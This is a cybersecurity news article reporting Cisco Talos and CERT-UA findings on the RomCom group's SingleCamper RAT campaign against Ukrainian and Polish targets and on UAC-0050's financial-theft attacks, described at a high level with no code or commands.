The Russian cyber threat group RomCom has been linked to a series of cyber attacks targeting Ukrainian government agencies and Polish organizations since late 2023. These intrusions feature the use of a new RomCom Remote Access Trojan (RAT) variant called SingleCamper, also known as SnipBot or RomCom 5.0, according to a report by Cisco Talos.
New Malware Variant: SingleCamper
Cisco Talos is tracking the threat under the codename UAT-5647. Security researchers Dmytro Korzhevin, Asheer Malhotra, Vanja Svajcer, and Vitor Ventura explain that this variant is loaded directly from the registry into the system’s memory and communicates via a loopback address to its loader, enhancing its stealth and persistence capabilities.
RomCom, also known by aliases such as Storm-0978, Tropical Scorpius, UAC-0180, UNC2596, and Void Rabisu, has been conducting multi-purpose cyber operations since 2022. These operations range from ransomware and extortion to credential gathering, signaling a blend of financial and espionage motives. The group's attack tempo has ramped up in recent months, emphasizing long-term persistence and data exfiltration.
Expanding Toolset
The RomCom group is expanding its tooling and infrastructure to support a variety of malware components written in multiple programming languages such as C++ (ShadyHammock), Rust (DustyHammock), Go (GLUEEGG), and Lua (DROPCLUE). This expansion underscores their adaptability across different platforms and environments.
The attack chains often begin with spear-phishing emails, which deliver a downloader—either MeltingClaw (written in C++) or RustyClaw (written in Rust)—designed to deploy the ShadyHammock and DustyHammock backdoors, respectively. To maintain the illusion of legitimacy, a decoy document is presented to the victim.
Backdoor Functionality
While DustyHammock establishes contact with a command-and-control (C2) server and allows the attacker to run commands and download files, ShadyHammock acts as an earlier-stage backdoor that facilitates the deployment of SingleCamper and listens for incoming commands. Despite its capabilities, ShadyHammock is believed to be a precursor to DustyHammock, with the latter being observed in attacks as recent as September 2024.
SingleCamper’s Role
The SingleCamper RAT carries out a range of post-compromise activities, including downloading PuTTY's Plink tool to establish remote tunnels with attacker-controlled infrastructure, conducting network reconnaissance, performing lateral movement, discovering user and system information, and exfiltrating data. This behavior is part of RomCom’s strategy to establish long-term access to compromised networks for espionage purposes, while also potentially deploying ransomware for financial gain.
The malware’s keyboard language checks suggest that Polish entities were also targeted in these attacks, though the focus remains on Ukrainian high-profile entities.
CERT-UA Warns of Additional Attacks
This RomCom campaign coincides with an alert from Ukraine's Computer Emergency Response Team (CERT-UA) regarding a threat actor called UAC-0050. This group has been responsible for a surge in financial theft and data-stealing attacks in recent months. UAC-0050 uses malware families like Remcos RAT, SectopRAT, Xeno RAT, Lumma Stealer, Mars Stealer, and Meduza Stealer to compromise systems, particularly targeting accountants at Ukrainian enterprises.
CERT-UA noted that during September - October 2024, UAC-0050 made at least 30 attempts to steal funds from Ukrainian businesses by leveraging remote banking systems to make fraudulent financial payments.
In addition, CERT-UA has identified efforts to distribute Meduza Stealer malware through the @reserveplusbot account on the Telegram messaging app, which falsely claims to offer technical support for the Reserve+ app. This app enables Ukrainian conscripts and reservists to update their personal data remotely, and the fraudulent account mimicked legitimate support channels as recently as May 2024.
The cyber landscape continues to evolve with the RomCom threat actor refining its tools and targeting both Ukrainian and Polish entities with advanced malware like SingleCamper. Organizations in the affected regions are urged to strengthen their defenses against spear-phishing campaigns, enhance malware detection, and implement stronger security protocols to thwart long-term access and data theft.
